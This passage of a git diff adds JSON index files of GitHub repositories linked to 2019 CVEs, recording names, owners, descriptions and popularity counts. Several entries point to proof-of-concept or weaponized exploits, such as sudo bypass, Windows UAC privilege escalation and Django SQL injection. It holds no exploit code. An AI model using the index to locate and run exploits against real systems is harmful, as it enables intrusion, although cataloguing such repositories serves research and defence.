+ "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13720.json b/2019/CVE-2019-13720.json new file mode 100644 index 0000000000..3835c0fa48 --- /dev/null +++ b/2019/CVE-2019-13720.json @@ -0,0 +1,64 @@ +[ + { + "id": 219498737, + "name": "cve-2019-13720", + "full_name": "cve-2019-13720\/cve-2019-13720", + "owner": { + "login": "cve-2019-13720", + "id": 57355337, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57355337?v=4", + "html_url": "https:\/\/github.com\/cve-2019-13720", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cve-2019-13720\/cve-2019-13720", + "description": "POC for CVE-2019-13720", + "fork": false, + "created_at": "2019-11-04T12:40:28Z", + "updated_at": "2024-08-12T19:54:32Z", + "pushed_at": "2019-11-04T19:40:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 249014343, + "name": "CVE-2019-13720", + "full_name": "ChoKyuWon\/CVE-2019-13720", + "owner": { + "login": "ChoKyuWon", + "id": 11254910, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11254910?v=4", + "html_url": "https:\/\/github.com\/ChoKyuWon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ChoKyuWon\/CVE-2019-13720", + "description": "PoC of CVE", + "fork": false, + "created_at": "2020-03-21T16:21:16Z", + "updated_at": "2024-08-12T19:59:05Z", + "pushed_at": "2020-03-21T16:21:58Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13764.json b/2019/CVE-2019-13764.json new file mode 100644 index 0000000000..610ea001bc --- /dev/null +++ b/2019/CVE-2019-13764.json @@ -0,0 +1,33 @@ +[ + { + "id": 389906091, + "name": "CVE-2019-13764", + "full_name": "HaboobLab\/CVE-2019-13764", + "owner": { + "login": "HaboobLab", + "id": 88026778, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88026778?v=4", + "html_url": "https:\/\/github.com\/HaboobLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HaboobLab\/CVE-2019-13764", + "description": null, + "fork": false, + "created_at": "2021-07-27T08:30:00Z", + "updated_at": "2023-11-04T16:07:30Z", + "pushed_at": "2021-07-27T10:26:07Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1385.json b/2019/CVE-2019-1385.json new file mode 100644 index 0000000000..d68a37929a --- /dev/null +++ b/2019/CVE-2019-1385.json @@ -0,0 +1,33 @@ +[ + { + "id": 269204367, + "name": "CVE-2019-1385", + "full_name": "0x413x4\/CVE-2019-1385", + "owner": { + "login": "0x413x4", + "id": 11176964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11176964?v=4", + "html_url": "https:\/\/github.com\/0x413x4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x413x4\/CVE-2019-1385", + "description": "Enjoy hacking ;)", + "fork": false, + "created_at": "2020-06-03T22:06:49Z", + "updated_at": "2023-12-05T13:00:37Z", + "pushed_at": "2019-12-25T11:20:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1388.json b/2019/CVE-2019-1388.json new file mode 100644 index 0000000000..bad1388b00 --- /dev/null +++ b/2019/CVE-2019-1388.json @@ -0,0 +1,157 @@ +[ + { + "id": 223103877, + "name": "CVE-2019-1388", + "full_name": "jas502n\/CVE-2019-1388", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-1388", + "description": "CVE-2019-1388 UAC提权 (nt authority\\system)", + "fork": false, + "created_at": "2019-11-21T06:26:27Z", + "updated_at": "2024-11-02T06:09:18Z", + "pushed_at": "2019-11-21T09:27:59Z", + "stargazers_count": 185, + "watchers_count": 185, + "has_discussions": false, + "forks_count": 56, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 56, + "watchers": 185, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 223127146, + "name": "CVE-2019-1388", + "full_name": "jaychouzzk\/CVE-2019-1388", + "owner": { + "login": "jaychouzzk", + "id": 45549315, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45549315?v=4", + "html_url": "https:\/\/github.com\/jaychouzzk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jaychouzzk\/CVE-2019-1388", + "description": null, + "fork": false, + "created_at": "2019-11-21T08:38:38Z", + "updated_at": "2024-08-12T19:55:04Z", + "pushed_at": "2019-11-21T08:41:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 224330054, + "name": "CVE-2019-1388", + "full_name": "sv3nbeast\/CVE-2019-1388", + "owner": { + "login": "sv3nbeast", + "id": 55974091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55974091?v=4", + "html_url": "https:\/\/github.com\/sv3nbeast", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sv3nbeast\/CVE-2019-1388", + "description": "guest→system(UAC手动提权)", + "fork": false, + "created_at": "2019-11-27T02:47:37Z", + "updated_at": "2024-08-12T19:55:14Z", + "pushed_at": "2020-03-18T06:21:13Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 74, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 364508152, + "name": "CVE-2019-1388", + "full_name": "nobodyatall648\/CVE-2019-1388", + "owner": { + "login": "nobodyatall648", + "id": 35725871, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35725871?v=4", + "html_url": "https:\/\/github.com\/nobodyatall648", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nobodyatall648\/CVE-2019-1388", + "description": "CVE-2019-1388 Abuse UAC Windows Certificate Dialog", + "fork": false, + "created_at": "2021-05-05T08:22:34Z", + "updated_at": "2024-10-03T05:15:29Z", + "pushed_at": "2021-05-06T02:45:21Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 374816052, + "name": "CVE-2019-1388", + "full_name": "suprise4u\/CVE-2019-1388", + "owner": { + "login": "suprise4u", + "id": 85527907, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85527907?v=4", + "html_url": "https:\/\/github.com\/suprise4u", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/suprise4u\/CVE-2019-1388", + "description": null, + "fork": false, + "created_at": "2021-06-07T22:29:08Z", + "updated_at": "2024-10-20T15:46:59Z", + "pushed_at": "2021-06-07T22:31:35Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13956.json b/2019/CVE-2019-13956.json new file mode 100644 index 0000000000..bf1015df64 --- /dev/null +++ b/2019/CVE-2019-13956.json @@ -0,0 +1,33 @@ +[ + { + "id": 247585587, + "name": "CVE-2019-13956", + "full_name": "rhbb\/CVE-2019-13956", + "owner": { + "login": "rhbb", + "id": 62225834, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62225834?v=4", + "html_url": "https:\/\/github.com\/rhbb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rhbb\/CVE-2019-13956", + "description": null, + "fork": false, + "created_at": "2020-03-16T01:43:04Z", + "updated_at": "2024-08-12T19:58:50Z", + "pushed_at": "2020-03-16T01:47:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13990.json b/2019/CVE-2019-13990.json new file mode 100644 index 0000000000..f3760b718c --- /dev/null +++ b/2019/CVE-2019-13990.json @@ -0,0 +1,33 @@ +[ + { + "id": 808786062, + "name": "Quartz-1", + "full_name": "epicosy\/Quartz-1", + "owner": { + "login": "epicosy", + "id": 30272775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30272775?v=4", + "html_url": "https:\/\/github.com\/epicosy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/epicosy\/Quartz-1", + "description": "quartz with CVE-2019-13990", + "fork": false, + "created_at": "2024-05-31T20:17:54Z", + "updated_at": "2024-05-31T20:19:05Z", + "pushed_at": "2024-05-31T20:19:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1402.json b/2019/CVE-2019-1402.json new file mode 100644 index 0000000000..b166eba00f --- /dev/null +++ b/2019/CVE-2019-1402.json @@ -0,0 +1,33 @@ +[ + { + "id": 221768702, + "name": "CorruptQueryAccessWorkaround", + "full_name": "lauxjpn\/CorruptQueryAccessWorkaround", + "owner": { + "login": "lauxjpn", + "id": 14178357, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14178357?v=4", + "html_url": "https:\/\/github.com\/lauxjpn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lauxjpn\/CorruptQueryAccessWorkaround", + "description": "The latest workaround for the \"Query is corrupt\" error introduced with CVE-2019-1402", + "fork": false, + "created_at": "2019-11-14T19:11:27Z", + "updated_at": "2024-08-12T19:54:51Z", + "pushed_at": "2019-12-10T18:51:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14040.json b/2019/CVE-2019-14040.json new file mode 100644 index 0000000000..542bc29f30 --- /dev/null +++ b/2019/CVE-2019-14040.json @@ -0,0 +1,33 @@ +[ + { + "id": 238079968, + "name": "CVE-2019-14040", + "full_name": "tamirzb\/CVE-2019-14040", + "owner": { + "login": "tamirzb", + "id": 1054209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1054209?v=4", + "html_url": "https:\/\/github.com\/tamirzb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tamirzb\/CVE-2019-14040", + "description": "PoC code for CVE-2019-14040", + "fork": false, + "created_at": "2020-02-03T23:04:49Z", + "updated_at": "2024-11-26T15:32:09Z", + "pushed_at": "2020-04-15T14:27:49Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14041.json b/2019/CVE-2019-14041.json new file mode 100644 index 0000000000..1149047e20 --- /dev/null +++ b/2019/CVE-2019-14041.json @@ -0,0 +1,33 @@ +[ + { + "id": 238080020, + "name": "CVE-2019-14041", + "full_name": "tamirzb\/CVE-2019-14041", + "owner": { + "login": "tamirzb", + "id": 1054209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1054209?v=4", + "html_url": "https:\/\/github.com\/tamirzb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tamirzb\/CVE-2019-14041", + "description": "PoC code for CVE-2019-14041", + "fork": false, + "created_at": "2020-02-03T23:05:10Z", + "updated_at": "2024-08-12T19:57:20Z", + "pushed_at": "2020-04-15T14:28:47Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1405.json b/2019/CVE-2019-1405.json new file mode 100644 index 0000000000..0786a3ac8e --- /dev/null +++ b/2019/CVE-2019-1405.json @@ -0,0 +1,33 @@ +[ + { + "id": 221504958, + "name": "COMahawk", + "full_name": "apt69\/COMahawk", + "owner": { + "login": "apt69", + "id": 55776655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55776655?v=4", + "html_url": "https:\/\/github.com\/apt69", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/apt69\/COMahawk", + "description": "Privilege Escalation: Weaponizing CVE-2019-1405 and CVE-2019-1322", + "fork": false, + "created_at": "2019-11-13T16:34:03Z", + "updated_at": "2024-11-08T15:58:08Z", + "pushed_at": "2019-11-14T14:16:54Z", + "stargazers_count": 350, + "watchers_count": 350, + "has_discussions": false, + "forks_count": 77, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 77, + "watchers": 350, + "score": 0, + "subscribers_count": 12 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14079.json b/2019/CVE-2019-14079.json new file mode 100644 index 0000000000..3c4fee64cd --- /dev/null +++ b/2019/CVE-2019-14079.json @@ -0,0 +1,33 @@ +[ + { + "id": 253164563, + "name": "CVE-2019-14079", + "full_name": "parallelbeings\/CVE-2019-14079", + "owner": { + "login": "parallelbeings", + "id": 14903009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14903009?v=4", + "html_url": "https:\/\/github.com\/parallelbeings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/parallelbeings\/CVE-2019-14079", + "description": "USB device fuzzing on Android Phone", + "fork": false, + "created_at": "2020-04-05T05:45:29Z", + "updated_at": "2024-08-12T19:59:44Z", + "pushed_at": "2021-10-16T15:23:41Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 29, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1422.json b/2019/CVE-2019-1422.json new file mode 100644 index 0000000000..fb96aa0f37 --- /dev/null +++ b/2019/CVE-2019-1422.json @@ -0,0 +1,33 @@ +[ + { + "id": 224766189, + "name": "cve-2019-1422", + "full_name": "ze0r\/cve-2019-1422", + "owner": { + "login": "ze0r", + "id": 43227253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43227253?v=4", + "html_url": "https:\/\/github.com\/ze0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ze0r\/cve-2019-1422", + "description": null, + "fork": false, + "created_at": "2019-11-29T02:58:32Z", + "updated_at": "2024-08-12T19:55:18Z", + "pushed_at": "2019-11-29T07:26:27Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14220.json b/2019/CVE-2019-14220.json new file mode 100644 index 0000000000..db11bbff3e --- /dev/null +++ b/2019/CVE-2019-14220.json @@ -0,0 +1,40 @@ +[ + { + "id": 211860095, + "name": "cve-2019-14220", + "full_name": "seqred-s-a\/cve-2019-14220", + "owner": { + "login": "seqred-s-a", + "id": 49437606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49437606?v=4", + "html_url": "https:\/\/github.com\/seqred-s-a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seqred-s-a\/cve-2019-14220", + "description": "Arbitrary file read in BlueStacks", + "fork": false, + "created_at": "2019-09-30T12:57:35Z", + "updated_at": "2024-08-12T19:53:30Z", + "pushed_at": "2019-09-30T13:11:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "advisory", + "android-emulator", + "cve", + "cve-2019-14220", + "exploit", + "security" + ], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14234.json b/2019/CVE-2019-14234.json new file mode 100644 index 0000000000..053dd0a22b --- /dev/null +++ b/2019/CVE-2019-14234.json @@ -0,0 +1,33 @@ +[ + { + "id": 691975068, + "name": "CVE-2019-14234", + "full_name": "malvika-thakur\/CVE-2019-14234", + "owner": { + "login": "malvika-thakur", + "id": 60217652, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60217652?v=4", + "html_url": "https:\/\/github.com\/malvika-thakur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/malvika-thakur\/CVE-2019-14234", + "description": "POC-Django JSONField\/HStoreField SQL Injection Vulnerability (CVE-2019-14234)", + "fork": false, + "created_at": "2023-09-15T09:34:56Z", + "updated_at": "2024-01-10T11:51:23Z", + "pushed_at": "2023-09-15T12:18:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14267.json b/2019/CVE-2019-14267.json new file mode 100644 index 0000000000..db3f1d0fc4 --- /dev/null +++ b/2019/CVE-2019-14267.json @@ -0,0 +1,33 @@ +[ + { + "id": 257930681, + "name": "pdfresurrect_CVE-2019-14267", + "full_name": "snappyJack\/pdfresurrect_CVE-2019-14267", + "owner": { + "login": "snappyJack", + "id": 16055573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16055573?v=4", + "html_url": "https:\/\/github.com\/snappyJack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snappyJack\/pdfresurrect_CVE-2019-14267", + "description": null, + "fork": false, + "created_at": "2020-04-22T14:46:57Z", + "updated_at": "2024-08-12T20:00:35Z", + "pushed_at": "2020-04-24T04:29:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14271.json b/2019/CVE-2019-14271.json new file mode 100644 index 0000000000..abc86e25e9 --- /dev/null +++ b/2019/CVE-2019-14271.json @@ -0,0 +1,33 @@ +[ + { + "id": 614431466, + "name": "CVE-2019-14271_Exploit", + "full_name": "iridium-soda\/CVE-2019-14271_Exploit", + "owner": { + "login": "iridium-soda", + "id": 32727642, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32727642?v=4", + "html_url": "https:\/\/github.com\/iridium-soda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iridium-soda\/CVE-2019-14271_Exploit", + "description": "A convenient and time-saving auto script of building environment and exploit it.", + "fork": false, + "created_at": "2023-03-15T15:13:27Z", + "updated_at": "2024-03-19T02:48:57Z", + "pushed_at": "2024-04-03T16:28:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14287.json b/2019/CVE-2019-14287.json new file mode 100644 index 0000000000..cba164b4cb --- /dev/null +++ b/2019/CVE-2019-14287.json @@ -0,0 +1,826 @@ +[ + { + "id": 215227089, + "name": "sudo-cve-2019-14287", + "full_name": "FauxFaux\/sudo-cve-2019-14287", + "owner": { + "login": "FauxFaux", + "id": 328180, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/328180?v=4", + "html_url": "https:\/\/github.com\/FauxFaux", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FauxFaux\/sudo-cve-2019-14287", + "description": null, + "fork": false, + "created_at": "2019-10-15T06:47:58Z", + "updated_at": "2024-08-12T19:53:55Z", + "pushed_at": "2019-10-15T06:48:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 215363376, + "name": "CVE-2019-14287-demo", + "full_name": "CashWilliams\/CVE-2019-14287-demo", + "owner": { + "login": "CashWilliams", + "id": 613573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/613573?v=4", + "html_url": "https:\/\/github.com\/CashWilliams", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CashWilliams\/CVE-2019-14287-demo", + "description": "This is a container built for demonstration purposes that has a version of the sudo command which is vulnerable to CVE-2019-14287", + "fork": false, + "created_at": "2019-10-15T17:58:36Z", + "updated_at": "2024-08-12T19:53:56Z", + "pushed_at": "2020-11-16T22:52:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "docker", + "security" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 215379835, + "name": "CVE-2019-14287", + "full_name": "n0w4n\/CVE-2019-14287", + "owner": { + "login": "n0w4n", + "id": 43784479, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43784479?v=4", + "html_url": "https:\/\/github.com\/n0w4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n0w4n\/CVE-2019-14287", + "description": "Sudo exploit", + "fork": false, + "created_at": "2019-10-15T19:26:42Z", + "updated_at": "2024-09-11T11:02:38Z", + "pushed_at": "2019-10-15T20:02:57Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 215573200, + "name": "CVE-2019-14287-write-up", + "full_name": "gurneesh\/CVE-2019-14287-write-up", + "owner": { + "login": "gurneesh", + "id": 26605645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26605645?v=4", + "html_url": "https:\/\/github.com\/gurneesh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gurneesh\/CVE-2019-14287-write-up", + "description": null, + "fork": false, + "created_at": "2019-10-16T14:47:08Z", + "updated_at": "2024-08-12T19:53:57Z", + "pushed_at": "2019-10-16T15:09:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 215939284, + "name": "Sudo-Security-Bypass-CVE-2019-14287", + "full_name": "shallvhack\/Sudo-Security-Bypass-CVE-2019-14287", + "owner": { + "login": "shallvhack", + "id": 15109539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15109539?v=4", + "html_url": "https:\/\/github.com\/shallvhack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shallvhack\/Sudo-Security-Bypass-CVE-2019-14287", + "description": "Sudo Security Bypass (CVE-2019-14287)", + "fork": false, + "created_at": "2019-10-18T04:11:14Z", + "updated_at": "2024-08-12T19:54:01Z", + "pushed_at": "2020-07-23T22:49:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 217958958, + "name": "cve-2019-14287-PPT", + "full_name": "huang919\/cve-2019-14287-PPT", + "owner": { + "login": "huang919", + "id": 54520509, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54520509?v=4", + "html_url": "https:\/\/github.com\/huang919", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huang919\/cve-2019-14287-PPT", + "description": null, + "fork": false, + "created_at": "2019-10-28T03:27:23Z", + "updated_at": "2024-08-12T19:54:18Z", + "pushed_at": "2019-11-13T13:21:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 220971939, + "name": "sudo-", + "full_name": "wenyu1999\/sudo-", + "owner": { + "login": "wenyu1999", + "id": 55389198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55389198?v=4", + "html_url": "https:\/\/github.com\/wenyu1999", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wenyu1999\/sudo-", + "description": "cve-2019-14287", + "fork": false, + "created_at": "2019-11-11T12:01:02Z", + "updated_at": "2024-08-12T19:54:44Z", + "pushed_at": "2019-11-11T12:02:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 221210783, + "name": "cve-2019-14287", + "full_name": "Sindadziy\/cve-2019-14287", + "owner": { + "login": "Sindadziy", + "id": 55396899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55396899?v=4", + "html_url": "https:\/\/github.com\/Sindadziy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sindadziy\/cve-2019-14287", + "description": null, + "fork": false, + "created_at": "2019-11-12T12:17:48Z", + "updated_at": "2024-08-12T19:54:46Z", + "pushed_at": "2019-11-12T12:18:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 221475763, + "name": "CVE-2019-14287-CVE-2014-6271", + "full_name": "Sindayifu\/CVE-2019-14287-CVE-2014-6271", + "owner": { + "login": "Sindayifu", + "id": 55397670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55397670?v=4", + "html_url": "https:\/\/github.com\/Sindayifu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sindayifu\/CVE-2019-14287-CVE-2014-6271", + "description": null, + "fork": false, + "created_at": "2019-11-13T14:17:19Z", + "updated_at": "2024-08-12T19:54:49Z", + "pushed_at": "2020-01-08T13:20:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 239374146, + "name": "Dockerized-CVE-2019-14287", + "full_name": "CMNatic\/Dockerized-CVE-2019-14287", + "owner": { + "login": "CMNatic", + "id": 4163116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4163116?v=4", + "html_url": "https:\/\/github.com\/CMNatic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CMNatic\/Dockerized-CVE-2019-14287", + "description": "Containerized and deployable use of the CVE-2019-14287 vuln. View README.md for more.", + "fork": false, + "created_at": "2020-02-09T21:05:20Z", + "updated_at": "2024-08-12T19:57:33Z", + "pushed_at": "2020-02-09T21:28:10Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + 